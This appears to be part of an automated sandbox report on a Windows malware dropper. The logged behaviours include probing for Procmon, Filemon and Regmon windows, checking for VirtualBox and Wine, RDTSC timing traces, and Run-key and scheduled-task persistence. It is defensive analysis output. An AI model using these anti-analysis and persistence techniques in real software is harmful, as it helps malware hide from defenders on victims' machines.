Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8138ba21a1.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bd214fbd32.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 136916b3ff.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\5VHE3T5UQF0Q17ZEPUURN3ZOS.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\GVMUIWZ4K51WM0HUSRJ8R.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E025BA second address: E025C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E025C5 second address: E025EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FDE71263CE6h 0x00000011 jl 00007FDE71263CE6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168A6 second address: E168B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007FDE70D000C6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168B4 second address: E168B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168B8 second address: E168D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jns 00007FDE70D000C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE70D000CEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168D8 second address: E168E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FDE71263CE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E168E8 second address: E16900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F7F second address: E16F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F84 second address: E16F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F8A second address: E16F9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FDE71263CE6h 0x00000008 jc 00007FDE71263CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16F9F second address: E16FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDE70D000D4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FBE second address: E16FCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FDE71263CE6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FCE second address: E16FD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FD2 second address: E16FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E16FD8 second address: E16FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E172D9 second address: E1731A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF7h 0x00000007 jmp 00007FDE71263CF8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FDE71263CE6h 0x00000016 jo 00007FDE71263CE6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1731A second address: E17320 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0B0 second address: E1A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0B6 second address: E1A0D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007FDE70D000CCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E1A0D1 second address: E1A0DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FDE71263CE6h 0x0000000a rdtsc
